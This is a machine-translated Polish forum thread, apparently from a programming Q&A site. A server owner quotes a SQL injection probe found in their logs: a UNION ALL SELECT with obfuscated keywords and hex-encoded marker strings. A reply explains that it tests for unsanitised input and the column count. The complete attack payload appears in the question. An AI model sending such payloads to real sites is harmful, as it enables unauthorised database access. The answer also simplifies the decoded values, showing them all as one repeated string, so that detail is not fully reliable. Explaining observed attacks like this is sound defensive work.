Sql injection może ktoś wyjaśnić mi ten kod

Question

Widziałem ten wtrysk sql/atak na jednym z moich serwerów i chciałbym wiedzieć, co próbuje zrobić. Wiem, że to atak, a po googlowaniu widzę, że jest on często używany, ale nie widzę wyjaśnienia, co robi i co to jest hex lub binarny. Oto ataku

press-detail.php?id=999999.9+%2f**%2fuNiOn%2f**%2faLl+%2f**%2fsElEcT+0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39,0x393133353134353632362e39,0x393133353134353632372e39,0x393133353134353632382e39,0x393133353134353632392e39,0x39313335313435363231302e39,0x39313335313435363231312e39,0x39313335313435363231322e39,0x39313335313435363231332e39,0x39313335313435363231342e39,0x39313335313435363231352e39,0x39313335313435363231362e39,0x39313335313435363231372e39,0x39313335313435363231382e39,0x39313335313435363231392e39,0x39313335313435363232302e39,0x39313335313435363232312e39,0x39313335313435363232322e39,0x39313335313435363232332e39,0x39313335313435363232342e39,0x39313335313435363232352e39,0x39313335313435363232362e39,0x39313335313435363232372e39,0x39313335313435363232382e39,0x39313335313435363232392e39,0x39313335313435363233302e39,0x39313335313435363233312e39,0x39313335313435363233322e39,0x39313335313435363233332e39,0x39313335313435363233342e39,0x39313335313435363233352e39,0x39313335313435363233362e39,0x39313335313435363233372e39,0x39313335313435363233382e39,0x39313335313435363233392e39,0x39313335313435363234302e39,0x39313335313435363234312e39,0x39313335313435363234322e39,0x39313335313435363234332e39,0x39313335313435363234342e39,0x39313335313435363234352e39,0x39313335313435363234362e39,0x39313335313435363234372e39,0x39313335313435363234382e39,0x39313335313435363234392e39,0x39313335313435363235302e39,0x39313335313435363235312e39,0x39313335313435363235322e39,0x39313335313435363235332e39,0x39313335313435363235342e39,0x39313335313435363235352e39,0x39313335313435363235362e39,0x39313335313435363235372e39,0x39313335313435363235382e39,0x39313335313435363235392e39,0x39313335313435363236302e39,0x39313335313435363236312e39,0x39313335313435363236322e39,0x39313335313435363236332e39,0x39313335313435363236342e39,0x39313335313435363236352e39,0x39313335313435363236362e39,0x39313335313435363236372e39,0x39313335313435363236382e39,0x39313335313435363236392e39,0x39313335313435363237302e39,0x39313335313435363237312e39,0x39313335313435363237322e39,0x39313335313435363237332e39+and+'1'='1 

Co chciałbym wiedzieć dlaczego „999999,9”, co jest „0x39313335313435363237322e39”. Kiedy atak ten działa, jakie informacje hakerzy mieliby lub edytowali, zrobiłby to w bazie danych. Ostatni atak, który może trwać przez cały czas, powoduje awarię/awarię serwera?

Wszelkie wyjaśnienia tego kodu byłyby bardzo mile widziane.

Answer 1

Tak więc, jak to jest being used a lot, chciałbym przesłać moją odpowiedź.

Moim zdaniem, celem tych wniosków jest sprawdzenie obecności lub nieobecności iniekcji sql. Jest to część kwerendy, która stara się wstrzyknąć:

999999.9 UNION ALL SELECT "91351456272.9","91351456272.9",...,"91351456272.9" and '1'='1 

Celem atakującego jest, aby zakończyć zapytanie w ten sposób:

SELECT * FROM table WHERE field=999999.9 UNION ALL SELECT "91351456272.9","91351456272.9",...,"91351456272.9" 

Jeśli field nie jest odkażane i tylko wtedy liczba kolumn używanych w dopasowaniu UNION SELECT z kolumnami zapytania, najprawdopodobniej pojawi się gdzieś na stronie w postaci ciągu 91351456272.9.

To będzie potwierdzone dla osoby atakującej lukę w zabezpieczeniach na stronie.